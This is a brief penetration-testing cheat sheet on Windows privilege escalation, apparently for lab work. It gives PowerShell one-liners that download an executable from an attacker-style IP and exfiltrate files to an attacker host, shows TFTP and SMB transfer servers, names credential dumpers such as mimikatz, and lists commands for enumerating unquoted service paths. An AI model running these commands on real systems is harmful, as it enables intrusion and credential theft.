Windows Privilege ESCALATION

Only so many ways in to the pot of gold here.

A Good PLACE TO Start

https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html

http://www.fuzzysecurity.com/tutorials/16.html

 

FILE TRANSFER

Powershell

Quick tip, to get files across the line, use PowerShell

Download

powershell -command (new-object System.Net.WebClient).DownloadFile('http://10.10.14.23:6000/some.exe','C:\Users\someuser\Documents\some.exe')

Upload / Exfil

powershell -command (Invoke-WebRequest -Uri <attackip:port> -Method Post -infile <file&location>)

Use nc to outfile to capture.

TFTP

Server

atftpd --daemon --port 69 /tftp

Client

tftp -i <serverIP> get <file>

SMBSErVER

/usr/share/doc/python-impacket/examples/smbserver.py <sharename> /smbshare/

Good Reference: https://blog.ropnop.com/transferring-files-from-kali-to-windows/

PASSWORDS

fgdump.exe

mimikatz.exe

wce.exe

ENUMERATE

List services

net start

Unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Find Service executable paths

reg query "HKLM\System\CurrentControlSet\Services\<serviceName>" /v "ImagePath"

Files

The code below would search the C: drive for a file created "01/19/2013 06:38 PM" the Output would be C:\FoundFiles.TXT.

@dir c:\*.* /s /t:c | findstr "01/19/2013  06:38 PM">c:\FoundFiles.TXT 

The code below will search for hidden files and output to c:\FoundHiddenFiles.TXT

@dir c:\*.* /s /a:h /t:c | findstr "01/19/2013  06:38 PM">c:\FoundHiddenFiles.TXT

TIPS

CMD Line Loop Through lines in file

for /F "tokens=*" %A in ("myfile.txt") do echo %A

A few more references


REFERENCES

Photo by Luca Bravo on Unsplash